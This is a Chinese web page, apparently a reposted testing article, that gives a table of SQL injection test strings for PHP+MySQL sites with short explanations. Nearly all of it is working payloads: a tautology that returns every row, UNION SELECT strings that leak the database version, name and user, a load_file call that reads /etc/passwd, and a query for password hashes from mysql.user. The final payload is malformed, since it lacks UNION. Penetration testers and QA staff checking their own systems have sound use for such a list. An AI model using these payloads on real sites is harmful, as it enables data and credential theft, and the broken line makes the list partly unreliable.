PHP+MySQL 网站 SQL 注入攻击测试用例
作者:网络转载 发布时间:[ 2013/12/5 11:17:27 ] 推荐标签:
SQL注入攻击测试用例 |
说明 |
Night |
判断注入点。第一次是正常请求,如果存在注入漏洞,那么第二次请求得到结果应该与第一次一样,并且第三次请求得到的结果应该与前两次不同 |
Night’ or 1=1# |
返回所有数据,常用于有搜索功能的页面 |
Night’ union select version()# |
返回数据库版本信息 |
Night’ union select database()# |
返回当前的库名 |
Night’ union select user()# |
返回数据库的用户名信息 |
Night’ union select session_user()# |
|
Night’ union select system_user()# |
|
Night’ union select load_file(‘/etc/passwd’)# |
读取系统文件 |
Night’ select user ,password from mysql.user# |
返回数据库用户的密码信息,密码一般以MD5的方式存放 |
相关推荐
更新发布
功能测试和接口测试的区别
2023/3/23 14:23:39如何写好测试用例文档
2023/3/22 16:17:39常用的选择回归测试的方式有哪些?
2022/6/14 16:14:27测试流程中需要重点把关几个过程?
2021/10/18 15:37:44性能测试的七种方法
2021/9/17 15:19:29全链路压测优化思路
2021/9/14 15:42:25性能测试流程浅谈
2021/5/28 17:25:47常见的APP性能测试指标
2021/5/8 17:01:11